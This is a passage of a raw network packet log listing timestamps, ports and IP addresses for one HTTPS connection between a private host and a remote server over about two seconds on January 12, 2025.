Jan 12, 2025 04:12:00.904333115 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.904397011 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.904582977 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.904633045 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.904659033 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.904722929 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.909007072 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.909065008 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.909085035 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.909137011 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.917728901 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.917804956 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.917829037 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.917886972 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.919380903 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.919447899 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.919462919 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.919523001 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.931664944 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.931730986 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.932004929 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.932070017 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.941309929 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.941378117 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.941437960 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.941508055 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.949807882 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.949985981 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.950037956 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.950103045 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.956095934 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.956163883 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.956209898 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.956270933 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.963917017 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.963980913 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.969703913 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.969768047 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.969793081 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.969851971 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.977159977 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.977225065 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.977272034 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.977333069 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.981220961 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.981277943 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.981307983 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.981369019 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.983053923 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.983258963 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.983310938 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.983388901 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.983445883 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.984430075 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.984491110 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.984582901 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.984651089 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.985851049 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.985910892 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.985937119 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.985992908 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.991187096 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.991245985 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.991293907 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.991358995 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.991429090 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.991488934 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.991514921 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.991573095 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.996372938 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.996438026 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:00.996534109 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:00.996593952 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.004513025 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.004578114 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.004633904 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.004692078 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.006104946 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.006169081 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.006200075 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.006258965 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.018682957 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.018750906 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.018783092 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.018847942 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.028279066 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.028347015 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.028393030 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.028455973 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.037619114 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.037693024 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.037940979 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.037998915 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.042836905 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.042905092 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.042922974 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.042979002 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.050704956 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.050770998 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.050815105 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.050877094 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.056499004 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.056569099 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.056636095 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.056703091 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.064013958 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.064075947 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.064125061 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.064186096 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.068232059 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.068293095 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.068317890 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.068375111 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.072307110 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.072372913 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.072422028 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.072482109 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.072513103 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.072572947 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.072597980 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.072659016 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.073780060 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.073842049 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.073864937 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.073926926 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.078852892 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.078917027 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.079071045 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.079132080 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.079417944 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.079478979 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.079502106 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.079561949 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.083621979 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.083683014 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.083709955 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.083770037 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.092538118 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.092602968 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.092819929 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.092880011 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.094024897 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.094086885 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.094170094 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.094229937 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.105560064 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.105628967 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.105644941 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.105700970 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.116122961 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.116187096 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.116252899 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.116404057 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.124716043 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.124782085 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.124800920 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.124862909 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.130686998 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.130748987 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.130817890 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.130876064 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.137669086 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.137734890 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.137770891 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.137829065 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.143511057 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.143573046 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.143590927 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.143651009 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.150908947 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.150991917 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.150994062 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.151020050 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.151057959 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.151083946 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.154911041 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.154983044 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.155024052 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.155081034 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232171059 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232237101 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232295990 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232356071 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232378006 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232419014 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232433081 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232486963 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232501030 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232553005 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232583046 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232613087 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232629061 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232662916 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232664108 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232690096 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232712984 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232728004 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232767105 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232791901 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232842922 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232853889 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232863903 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232886076 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232898951 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232922077 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232928991 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232928991 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.232948065 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.232980967 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.233005047 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.237914085 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.237992048 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.238039970 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.238099098 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.241796017 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.241863966 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.241918087 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.241971970 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.244075060 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.244138956 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.244170904 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.244226933 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.245390892 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.245451927 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.245472908 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.245526075 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.246324062 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.246387959 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.246412992 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.246464014 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.252192974 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.252259016 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.252418041 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.252476931 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.252662897 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.252717972 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.252743959 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.252799034 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.256720066 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.256787062 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.256829977 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.256901979 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.265279055 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.265357018 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.265413046 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.265474081 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.266741991 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.266805887 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.266823053 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.266881943 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.279582977 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.279670000 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.279684067 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.279706955 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.279742956 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.279768944 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.289041042 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.289112091 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.289160967 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.289225101 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.297530890 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.297600985 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.297621012 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.297684908 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.303502083 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.303565025 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.303584099 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.303648949 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.311475992 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.311547041 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.311676025 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.311738968 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.317224979 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.317289114 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.317306995 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.317363977 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.324716091 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.324783087 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.324829102 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.324893951 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.328744888 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.328809023 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.535424948 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.535641909 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585432053 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585493088 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585532904 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585572958 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585592031 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585642099 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585659981 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585696936 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585721970 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585755110 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585767984 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585813999 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585817099 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585833073 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585849047 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585875988 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585906029 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585921049 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.585968971 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.585985899 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.586034060 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.586080074 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.586117029 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.586133003 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.586205959 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:01.795325994 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:01.795542955 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.211325884 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.211503983 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235150099 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235209942 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235270023 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235322952 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235342026 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235403061 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235403061 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235419035 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235455036 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235481024 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235508919 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235534906 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235534906 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235558033 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235575914 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235579014 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235626936 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235657930 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235673904 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235687971 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235714912 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235733986 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235748053 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235774040 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235793114 CET	49992	443	192.168.2.4	118.178.60.9
Jan 12, 2025 04:12:02.235805035 CET	443	49992	118.178.60.9	192.168.2.4
Jan 12, 2025 04:12:02.235857010 CET	49992	443	192.168.2.4	118.178.60.9
